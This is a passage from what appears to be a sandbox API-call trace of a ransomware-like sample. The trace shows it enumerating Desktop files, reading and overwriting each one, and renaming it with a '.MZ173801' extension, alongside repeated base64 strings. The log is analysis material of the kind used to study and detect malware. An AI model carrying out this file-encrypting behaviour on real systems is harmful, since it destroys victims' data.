CloseHandle (hObject=0x410) returned 1 [0124.135] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XVeVbH-.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xvevbh-.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.137] WriteFile (in: hFile=0x410, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3262, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3262, lpOverlapped=0x0) returned 1 [0124.138] CloseHandle (hObject=0x410) returned 1 [0124.138] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XVeVbH-.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xvevbh-.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XVeVbH-.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xvevbh-.gif.mz173801")) returned 1 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] GetCurrentThreadId () returned 0x1358 [0124.139] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2948af00, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x3e678140, ftLastAccessTime.dwHighDateTime=0x1d5e63a, ftLastWriteTime.dwLowDateTime=0x3e678140, ftLastWriteTime.dwHighDateTime=0x1d5e63a, nFileSizeHigh=0x0, nFileSizeLow=0xc7b4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ZB jpmR.mp3", cAlternateFileName="ZBJPMR~1.MP3")) returned 1 [0124.139] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.139] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.139] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZB jpmR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\zb jpmr.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2948af00, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x3e678140, ftLastAccessTime.dwHighDateTime=0x1d5e63a, ftLastWriteTime.dwLowDateTime=0x3e678140, ftLastWriteTime.dwHighDateTime=0x1d5e63a, nFileSizeHigh=0x0, nFileSizeLow=0xc7b4)) returned 1 [0124.140] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.140] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.140] GetCurrentThreadId () returned 0x1358 [0124.140] GetCurrentThreadId () returned 0x1358 [0124.140] GetCurrentThreadId () returned 0x1358 [0124.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.141] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.141] GetCurrentThreadId () returned 0x1358 [0124.141] GetCurrentThreadId () returned 0x1358 [0124.141] GetCurrentThreadId () returned 0x1358 [0124.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZB jpmR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\zb jpmr.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.141] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.141] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.141] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xc7b4 [0124.142] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.142] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xc7b4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xc7b4, lpOverlapped=0x0) returned 1 [0124.143] CloseHandle (hObject=0x410) returned 1 [0124.144] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZB jpmR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\zb jpmr.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.146] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xc7b4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xc7b4, lpOverlapped=0x0) returned 1 [0124.148] CloseHandle (hObject=0x410) returned 1 [0124.148] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ZB jpmR.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\zb jpmr.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ZB jpmR.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\zb jpmr.mp3.mz173801")) returned 1 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] GetCurrentThreadId () returned 0x1358 [0124.149] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe492b420, ftCreationTime.dwHighDateTime=0x1d5e641, ftLastAccessTime.dwLowDateTime=0xb651a2f0, ftLastAccessTime.dwHighDateTime=0x1d5edb3, ftLastWriteTime.dwLowDateTime=0xb651a2f0, ftLastWriteTime.dwHighDateTime=0x1d5edb3, nFileSizeHigh=0x0, nFileSizeLow=0x1279e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="zcrVUSJG.png", cAlternateFileName="")) returned 1 [0124.149] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.149] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zcrVUSJG.png" (normalized: "c:\\users\\fd1hvy\\desktop\\zcrvusjg.png"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe492b420, ftCreationTime.dwHighDateTime=0x1d5e641, ftLastAccessTime.dwLowDateTime=0xb651a2f0, ftLastAccessTime.dwHighDateTime=0x1d5edb3, ftLastWriteTime.dwLowDateTime=0xb651a2f0, ftLastWriteTime.dwHighDateTime=0x1d5edb3, nFileSizeHigh=0x0, nFileSizeLow=0x1279e)) returned 1 [0124.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.150] GetCurrentThreadId () returned 0x1358 [0124.150] GetCurrentThreadId () returned 0x1358 [0124.150] GetCurrentThreadId () returned 0x1358 [0124.150] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.151] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERk